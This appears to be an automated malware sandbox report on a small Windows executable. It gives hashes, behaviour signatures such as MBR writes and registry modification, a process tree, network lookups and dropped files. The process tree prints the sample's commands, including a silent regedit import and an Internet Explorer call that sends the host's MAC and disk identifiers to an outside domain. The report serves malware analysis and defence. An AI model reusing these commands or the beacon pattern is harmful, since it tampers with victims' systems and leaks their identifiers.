Analysis

  • max time kernel
    86s
  • max time network
    127s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/09/2022, 06:13 UTC

General

  • Target

    d482c6d215425a56e2e15e213afef92f1db2116e12e4e45cefda3e7089dadd98.exe

  • Size

    16KB

  • MD5

    d51ebbfd2b0b1d0fa237212c183770c4

  • SHA1

    b063f620d68f26f8411045024f631c7a20bb9bc9

  • SHA256

    d482c6d215425a56e2e15e213afef92f1db2116e12e4e45cefda3e7089dadd98

  • SHA512

    6cd1ff448bcc1f7367b7ed156b368d68abba5a5d91b043bcb5151f61ca14327dcf83a4af614188de2adbf442f24ef8526f161f373cf78685c994e655a5d0a01b

  • SSDEEP

    384:3at4aSo1+esbKvlJCHJkXnY0bGgFIUXfUGzh6js7lNTn6MIy2:6So1Q4wk3Y0I+gsDn6MI9

Score
6/10

Malware Config

Signatures

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Modifies Internet Explorer settings 1 TTPs 11 IoCs
  • Modifies registry class 14 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d482c6d215425a56e2e15e213afef92f1db2116e12e4e45cefda3e7089dadd98.exe
    "C:\Users\Admin\AppData\Local\Temp\d482c6d215425a56e2e15e213afef92f1db2116e12e4e45cefda3e7089dadd98.exe"
    1⤵
    • Writes to the Master Boot Record (MBR)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3932
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c regedit /s "C:\Users\Admin\AppData\Local\Temp\getback.reg"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4992
      • C:\Windows\SysWOW64\regedit.exe
        regedit /s "C:\Users\Admin\AppData\Local\Temp\getback.reg"
        3⤵
        • Modifies registry class
        • Runs .reg file with regedit
        PID:2716
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://union.wanwan.cc/Stat.ashx?Mac=0046CE8ECE48&Hard=QM00013&ClientType=Home&Process=86&UserID=0030&Authen=803-465
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:308
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:308 CREDAT:17410 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:3132

Network

  • flag-us
    DNS
    union.wanwan.cc
    IEXPLORE.EXE
    Remote address:
    8.8.8.8:53
    Request
    union.wanwan.cc
    IN A
    Response
  • flag-us
    DNS
    union.wanwan.cc
    IEXPLORE.EXE
    Remote address:
    8.8.8.8:53
    Request
    union.wanwan.cc
    IN A
    Response
  • 20.189.173.15:443
    322 B
    7
  • 2.18.109.224:443
    322 B
    7
  • 8.8.8.8:53
    union.wanwan.cc
    dns
    IEXPLORE.EXE
    61 B
    61 B
    1
    1

    DNS Request

    union.wanwan.cc

  • 8.8.8.8:53
    union.wanwan.cc
    dns
    IEXPLORE.EXE
    61 B
    61 B
    1
    1

    DNS Request

    union.wanwan.cc

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\getback.reg

    Filesize

    1KB

    MD5

    626e2d76f5c328d57a3eff6a7f94d129

    SHA1

    210fd33fa005775b30a8fd40a065a2e788934216

    SHA256

    5d9ae4b62924d6da9c35305bfd0d61c893767b7113f8b2f239da02057f8bee6e

    SHA512

    629290bd5791a42327b3b70a68609c6b0b9114365be8579553e01e6cbc98996c0fab475b88c0dd80d34dcc325453401c6cce26fb70ed67a9cb08271a07fd85a1

  • memory/3932-132-0x0000000000400000-0x000000000040D000-memory.dmp

    Filesize

    52KB

  • memory/3932-138-0x0000000000400000-0x000000000040D000-memory.dmp

    Filesize

    52KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.